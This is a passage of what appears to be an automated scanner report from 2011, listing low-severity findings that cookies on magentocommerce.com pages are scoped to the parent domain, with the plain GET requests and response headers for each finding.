Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sat, 11-Aug-2012 23:49:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170873; expires=Sat, 11-Aug-2012 13:41:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:13 GMT
Content-Length: 35376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.2. http://www.magentocommerce.com/media/screencasts/configurable-products/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.3. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.4. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.5. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
3.6. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.7. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.10. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.11. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.12. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.13. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

